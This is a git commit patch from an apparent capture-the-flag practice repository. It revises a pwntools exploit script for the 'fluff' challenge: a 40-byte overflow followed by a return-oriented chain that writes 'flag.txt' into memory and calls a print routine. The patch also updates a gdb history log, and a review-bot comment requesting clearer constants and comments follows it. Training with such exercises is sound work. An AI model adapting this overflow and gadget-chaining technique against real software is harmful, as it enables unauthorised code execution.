From 406768c5fead9fcadc9dc466da4286e5ac3c7274 Mon Sep 17 00:00:00 2001
From: Brett Weiland
Date: Fri, 18 Dec 2020 01:42:14 -0600
Subject: deleted: x86_64/badchars/core modified: x86_64/fluff/.gdb_history deleted: x86_64/fluff/core modified: x86_64/fluff/exploit.py deleted: x86_64/ret2win/core deleted: x86_64/split/core deleted: x86_64/write4/core
---
 x86_64/fluff/.gdb_history | 47 +++++++++++++++++++++++++++++++---------------
 x86_64/fluff/core | Bin 4292608 -> 0 bytes
 x86_64/fluff/exploit.py | 30 ++++++++++++++---------------
 3 files changed, 46 insertions(+), 31 deletions(-)
 delete mode 100644 x86_64/fluff/core
(limited to 'x86_64/fluff')
diff --git a/x86_64/fluff/.gdb_history b/x86_64/fluff/.gdb_history
index cfa1057..0d0b7f2 100644
--- a/x86_64/fluff/.gdb_history
+++ b/x86_64/fluff/.gdb_history
@@ -1,19 +1,4 @@
 quit
-quit
-continue
-nexti
-nexti
-info reg rdi
-stepi
-nexti
-info reg rcx
-nexti
-info reg rbx
-stepi
-info reg rdx
-inro reg rbx
-info reg rbx
-quit
 stepi
 continue
 stepi
@@ -237,3 +222,35 @@ x/x 0x601be0 + 8
 x/x 0x601be0 + 9
 x/x 0x601be0 + 10
 quit
+continue
+context
+x/x 0x7fff0b74fed0
+x/100x 0x7fff0b74fed0
+quit
+break *0x400639
+continue
+context
+continue
+x/s 0x601be0
+continue
+x/s 0x601be0
+stepi
+stepi
+x/s 0x601be0
+quit
+continue
+continue
+quit
+break *0x00000000004006a3
+continue
+continue
+quit
+break pwnme
+run
+continue
+break *0x00000000004006a3
+continue
+info reg rip
+continue
+info reg rip
+quit
diff --git a/x86_64/fluff/core b/x86_64/fluff/core
deleted file mode 100644
index ae36a67..0000000
Binary files a/x86_64/fluff/core and /dev/null differ
diff --git a/x86_64/fluff/exploit.py b/x86_64/fluff/exploit.py
index cdf5de8..2b520d8 100755
--- a/x86_64/fluff/exploit.py
+++ b/x86_64/fluff/exploit.py
@@ -13,37 +13,35 @@ letter_lookups = { def write_str(dest, string, payload): payload += p64(0x00000000004006a3) payload += p64(dest) - for c in string: - payload += p64(0x40062a) - payload += p64(0x4000) # if things go wrong, check endian/order + payload += p64(0x0000000000400610) + payload += p64(1) + payload += p64(0x40062a) + payload += p64(0x4000) + payload += p64(letter_lookups[string[0]] - 0x3ef2) + payload += p64(0x400628) + payload += p64(0x400639) + + + for c in string[1:]: + payload += p64(0x40062b) payload += p64(letter_lookups[c] - 0x3ef2) - payload += p64(0x0000000000400610) - payload += p64(0) - + payload += p64(1) payload += p64(0x400628) - payload += p64(0x400639) return(payload) -prog = gdb.debug('./fluff', gdbscript=''' -break *pwnme + 151 -''' -) +prog = process('./fluff') payload = b'' for c in range(40): payload += b'a' payload = write_str(0x0000000000600df0 + 0x00000df0, 'flag.txt', payload) payload += p64(0x00000000004006a3) -payload += p64(0x601be0) # set rdi - +payload += p64(0x601be0) payload += p64(0x0000000000400510) -payload += b"\n" prog.sendline(payload) -sleep(1) -print(str(prog.recv(), 'UTF-8')) prog.interactive() -- cgit v1.2.3
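Review bot: The rewritten body of write_str (and the tail of the script) is now a bare sequence of `p64(0x...)` addresses and offsets with no comment saying what any of them is for, and the hunk also drops the only two comments the old version had (`# set rdi`, `# if things go wrong, check endian/order`). Give each address a module-level named constant next to the `letter_lookups` table (which starts above this hunk) or at least a one-line comment per value, and add a docstring on write_str stating that it appends to `payload` a chain that appears to write `string` to `dest` and returns the extended bytes. In particular the first-character block uses `0x40062a` while the loop uses `0x40062b`, and the loop's `p64(1)` replaces the old `p64(0)`; if that difference is intentional it needs a comment, because it reads as a typo otherwise. Below the function, `payload = b''` plus `for c in range(40): payload += b'a'` is just `payload = b'a' * 40`, and `return(payload)` should be `return payload`.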